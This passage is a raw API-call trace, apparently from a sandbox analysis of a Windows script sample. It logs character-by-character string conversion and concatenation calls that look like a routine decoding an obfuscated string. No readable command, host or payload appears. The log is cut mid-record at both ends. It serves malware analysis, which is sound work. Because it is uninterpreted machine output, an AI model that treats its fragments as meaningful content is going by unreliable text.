(in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.363] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0172.363] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f810, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.364] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1168434, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.364] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f810, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.369] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x11684d4, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0172.369] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f810, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.370] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.370] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f810, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.371] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1168434, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0172.372] VarCat (in: pvarLeft=0x28f870, pvarRight=0x28f940, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.372] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x116845c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0172.373] VarCat (in: pvarLeft=0x28f870, pvarRight=0x28f940, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.373] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0172.373] VarCat (in: pvarLeft=0x28f870, pvarRight=0x28f940, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.374] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1168434, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0172.374] VarCat (in: pvarLeft=0x28f870, pvarRight=0x28f940, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.375] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116845c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0172.375] VarCat (in: pvarLeft=0x28f870, pvarRight=0x28f940, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.376] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0172.376] VarCat (in: pvarLeft=0x28f870, pvarRight=0x28f940, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.377] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1168434, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0172.377] VarCat (in: pvarLeft=0x28f870, pvarRight=0x28f940, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.378] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116845c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0172.378] VarCat (in: pvarLeft=0x28f870, pvarRight=0x28f940, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.379] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0172.379] VarCat (in: pvarLeft=0x28f870, pvarRight=0x28f940, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.380] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0x1168434, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0172.384] VarCat (in: pvarLeft=0x28f870, pvarRight=0x28f940, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.385] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116845c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0172.385] VarCat (in: pvarLeft=0x28f870, pvarRight=0x28f940, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.386] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0172.386] VarCat (in: pvarLeft=0x28f870, pvarRight=0x28f940, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.387] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1168434, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.387] VarCat (in: pvarLeft=0x28f870, pvarRight=0x28f940, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.388] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x116845c, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0172.388] VarCat (in: pvarLeft=0x28f870, pvarRight=0x28f940, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.389] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1168434, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.389] VarCat (in: pvarLeft=0x28f870, pvarRight=0x28f940, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.390] VarSub (in: pvarLeft=0x28f7d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x116845c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0172.390] VarCat (in: pvarLeft=0x28f9b0, pvarRight=0x28f820, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.391] VarSub (in: pvarLeft=0x28f7d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0172.391] VarCat (in: pvarLeft=0x28f9b0, pvarRight=0x28f820, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.392] VarSub (in: pvarLeft=0x28f7d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0172.392] VarCat (in: pvarLeft=0x28f9b0, pvarRight=0x28f820, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.393] VarSub (in: pvarLeft=0x28f7d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116845c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0172.393] VarCat (in: pvarLeft=0x28f9b0, pvarRight=0x28f820, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.394] VarSub (in: pvarLeft=0x28f7d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0172.394] VarCat (in: pvarLeft=0x28f9b0, pvarRight=0x28f820, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.395] VarSub (in: pvarLeft=0x28f7d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0172.395] VarCat (in: pvarLeft=0x28f9b0, pvarRight=0x28f820, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.556] VarSub (in: pvarLeft=0x28f7d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116845c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0172.556] VarCat (in: pvarLeft=0x28f9b0, pvarRight=0x28f820, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.557] VarSub (in: pvarLeft=0x28f7d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0172.557] VarCat (in: pvarLeft=0x28f9b0, pvarRight=0x28f820, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.558] VarSub (in: pvarLeft=0x28f7d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0172.558] VarCat (in: pvarLeft=0x28f9b0, pvarRight=0x28f820, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.558] VarSub (in: pvarLeft=0x28f7d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116845c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0172.559] VarCat (in: pvarLeft=0x28f9b0, pvarRight=0x28f820, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.559] VarSub (in: pvarLeft=0x28f7d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0172.560] VarCat (in: pvarLeft=0x28f9b0, pvarRight=0x28f820, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.560] VarSub (in: pvarLeft=0x28f7d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0172.561] VarCat (in: pvarLeft=0x28f9b0, pvarRight=0x28f820, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.562] VarSub (in: pvarLeft=0x28f820, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0172.562] VarCat (in: pvarLeft=0x28f980, pvarRight=0x28f930, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="]", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="]\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.563] VarSub (in: pvarLeft=0x28f820, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="P", cbMultiByte=1, lpWideCharStr=0x116845c, cchWideChar=1 | out: lpWideCharStr="P") returned 1 [0172.563] VarCat (in: pvarLeft=0x28f980, pvarRight=0x28f930, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.564] VarSub (in: pvarLeft=0x28f820, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0172.564] VarCat (in: pvarLeft=0x28f980, pvarRight=0x28f930, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.565] VarSub (in: pvarLeft=0x28f820, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0172.565] VarCat (in: pvarLeft=0x28f980, pvarRight=0x28f930, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.566] VarSub (in: pvarLeft=0x28f820, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x116845c, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0172.566] VarCat (in: pvarLeft=0x28f980, pvarRight=0x28f930, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, 